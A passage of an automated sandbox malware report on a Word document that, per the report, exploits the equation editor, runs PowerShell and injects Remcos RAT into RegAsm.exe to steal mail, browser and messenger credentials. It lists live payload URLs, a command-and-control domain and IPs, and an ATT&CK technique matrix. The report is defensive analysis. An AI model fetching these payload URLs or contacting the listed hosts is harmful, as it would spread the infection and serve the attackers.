                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2092, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EPF38IJump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe13_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts11
                  Native API                  		111
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		15
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		2
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts122
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares2
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  Bypass User Account Control                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model211
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script422
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets38
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input Capture114
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                  Process Injection                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522765 Sample: AMG Cargo Logistic.docx Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 55 og1.in 2->55 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 20 other signatures 2->87 12 WINWORD.EXE 308 48 2->12         started        signatures3 process4 dnsIp5 59 91.134.96.177, 49169, 49171, 49173 OVHFR France 12->59 61 og1.in 172.67.216.244, 443, 49163, 49165 CLOUDFLARENETUS United States 12->61 63 104.21.78.54, 443, 49164, 49166 CLOUDFLARENETUS United States 12->63 49 C:\Users\user\...\uc on 91.134.96.177.url, MS 12->49 dropped 51 C:\Users\user\AppData\Roaming\...\S7UYq0.url, MS 12->51 dropped 53 ~WRF{6BDC8419-19FD...2-6E5B13CC56D9}.tmp, Composite 12->53 dropped 115 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->115 117 Office viewer loads remote template 12->117 119 Microsoft Office drops suspicious files 12->119 17 EQNEDT32.EXE 12 12->17         started        file6 signatures7 process8 file9 47 picturewithherimag...goodforyourhear.Vbs, Unicode 17->47 dropped 77 Office equation editor establishes network connection 17->77 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->79 21 wscript.exe 1 17->21         started        signatures10 process11 signatures12 97 Suspicious powershell command line found 21->97 99 Wscript starts Powershell (via cmd or directly) 21->99 101 Bypasses PowerShell execution policy 21->101 103 2 other signatures 21->103 24 powershell.exe 4 21->24         started        process13 signatures14 105 Suspicious powershell command line found 24->105 107 Obfuscated command line found 24->107 109 Suspicious execution chain found 24->109 27 powershell.exe 12 5 24->27         started        process15 dnsIp16 57 raw.githubusercontent.com 185.199.109.133, 443, 49172 FASTLYUS Netherlands 27->57 111 Writes to foreign memory regions 27->111 113 Injects a PE file into a foreign processes 27->113 31 RegAsm.exe 3 13 27->31         started        signatures17 process18 dnsIp19 65 maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro 45.90.89.98, 49174, 49175, 6845 CMCSUS Bulgaria 31->65 67 geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands 31->67 45 C:\Users\user\AppData\Local\Temp\...\logs.dat, data 31->45 dropped 69 Contains functionality to bypass UAC (CMSTPLUA) 31->69 71 Detected Remcos RAT 31->71 73 Tries to steal Mail credentials (via file registry) 31->73 75 8 other signatures 31->75 36 RegAsm.exe 1 31->36         started        39 RegAsm.exe 31->39         started        41 RegAsm.exe 31->41         started        43 9 other processes 31->43 file20 signatures21 process22 signatures23 89 Tries to steal Instant Messenger accounts or passwords 36->89 91 Tries to steal Mail credentials (via file / registry access) 36->91 93 Searches for Windows Mail specific files 36->93 95 Tries to harvest and steal browser information (history, passwords, etc) 41->95

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  AMG Cargo Logistic.docx13%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp100%AviraEXP/CVE-2017-11882.Gen

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  og1.in
                  		172.67.216.244
                  		truetrue
                    		unknown
                    raw.githubusercontent.com
                    		185.199.109.133
                    		truefalse
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown
                        maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                        		45.90.89.98
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://og1.in/S7UYq0false
                            		unknown
                            http://91.134.96.177/80/WRRDFC.txttrue
                              		unknown
                              https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                                		unknown
                                maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.protrue
                                  		unknown
                                  http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doctrue
                                    		unknown
                                    http://geoplugin.net/json.gpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFtrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://b.scorecardresearch.com/beacon.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                        		unknown
                                        http://www.imvu.com/DKRegAsm.exe, 00000019.00000002.464947704.000000000015C000.00000004.00000010.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://acdn.adnxs.com/ast/ast.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                            		unknown
                                            http://www.imvu.comrRegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		unknown
                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvC227.tmp.20.drfalse
                                                		unknown
                                                http://ocsp.entrust.net03powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                  		unknown
                                                  https://contoso.com/Licensepowershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000010.00000002.465963894.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466045684.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466001637.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467538863.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467552558.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467525342.0000000002B3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                      		unknown
                                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                            		unknown
                                                            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                              		unknown
                                                              http://www.nirsoft.netRegAsm.exe, 00000010.00000002.463843810.0000000000572000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://deff.nelreports.net/api/report?cat=msnbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                  		unknown
                                                                  http://www.nirsoft.netPRegAsm.exe, 00000014.00000002.466839768.0000000000292000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                      		unknown
                                                                      http://go.microspowershell.exe, 0000000C.00000002.443014450.000000000258B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFjEQNEDT32.EXE, 00000008.00000002.424729552.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://cache.btrll.com/default/Pix-1x1.gifbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                              		unknown
                                                                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                		unknown
                                                                                https://www.google.comRegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://o.aolcdn.com/ads/adswrappermsni.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                    		unknown
                                                                                    http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                      		unknown
                                                                                      http://www.msn.com/?ocid=iehpbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                        		unknown
                                                                                        https://contoso.com/powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                          		unknown
                                                                                          http://static.chartbeat.com/js/chartbeat.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                            		unknown
                                                                                            http://www.msn.com/de-de/?ocid=iehpbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                              		unknown
                                                                                              http://91.134.96.177powershell.exe, 0000000C.00000002.443014450.00000000024F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvC227.tmp.20.drfalse
                                                                                                  		unknown
                                                                                                  https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                                    		unknown
                                                                                                    http://www.nirsoft.net/RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://ocsp.entrust.net0Dpowershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.450223595.0000000002440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443014450.0000000002251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                          		unknown
                                                                                                          http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                            		unknown
                                                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                              		unknown
                                                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                		unknown
                                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                  		unknown
                                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                    		unknown
                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                      		unknown
                                                                                                                      http://crl.entrust.net/server1.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.imvu.com/cKRegAsm.exe, 00000012.00000002.453926573.000000000016C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://contextual.media.net/8/nrrV73987.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                            		unknown
                                                                                                                            http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000012.00000002.454067819.0000000001F59000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000019.00000002.465508111.0000000000569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://contoso.com/Iconpowershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://contextual.media.net/bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                		unknown
                                                                                                                                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvC227.tmp.20.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.msn.com/bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                      		unknown
                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvC227.tmp.20.drfalse
                                                                                                                                        		unknown
                                                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                            		unknown
                                                                                                                                            https://raw.githubusercontent.compowershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://cdn.at.atwola.com/_media/uac/msn.htmlbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://91.134.96.177/80/uc/uc on 91.134.96.177.url.0.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://go.microsoft.c9Vpowershell.exe, 0000000C.00000002.442724340.000000000003A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://policies.yahoo.com/w3c/p3p.xmlbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.msn.com/advertisement.ad.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                104.21.78.54
                                                                                                                                                                		unknownUnited States
                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                45.90.89.98
                                                                                                                                                                		maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proBulgaria
                                                                                                                                                                		33657CMCSUStrue
                                                                                                                                                                185.199.109.133
                                                                                                                                                                		raw.githubusercontent.comNetherlands
                                                                                                                                                                		54113FASTLYUSfalse
                                                                                                                                                                91.134.96.177
                                                                                                                                                                		unknownFrance
                                                                                                                                                                		16276OVHFRtrue
                                                                                                                                                                178.237.33.50
                                                                                                                                                                		geoplugin.netNetherlands
                                                                                                                                                                		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                172.67.216.244
                                                                                                                                                                		og1.inUnited States
                                                                                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1522765
                                                                                                                                                                Start date and time:2024-09-30 16:23:01 +02:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 11m 8s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:26
                                                                                                                                                                Number of new started drivers analysed:1
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:AMG Cargo Logistic.docx
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winDOCX@34/33@10/6
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 71.4%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                • Number of executed functions: 172
                                                                                                                                                                • Number of non-executed functions: 278
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .docx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                • Override analysis time to 80068.883614884 for current running targets taking high CPU consumption
                                                                                                                                                                • Override analysis time to 160137.767229768 for current running targets taking high CPU consumption

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3744 because there are no executed function
                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 3864 because it is empty
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • VT rate limit hit for: AMG Cargo Logistic.docx

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                10:24:23API Interceptor70x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                10:24:27API Interceptor6x Sleep call for process: wscript.exe modified
                                                                                                                                                                10:24:28API Interceptor114x Sleep call for process: powershell.exe modified
                                                                                                                                                                10:24:36API Interceptor8598627x Sleep call for process: RegAsm.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                104.21.78.54PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                  PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                          PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
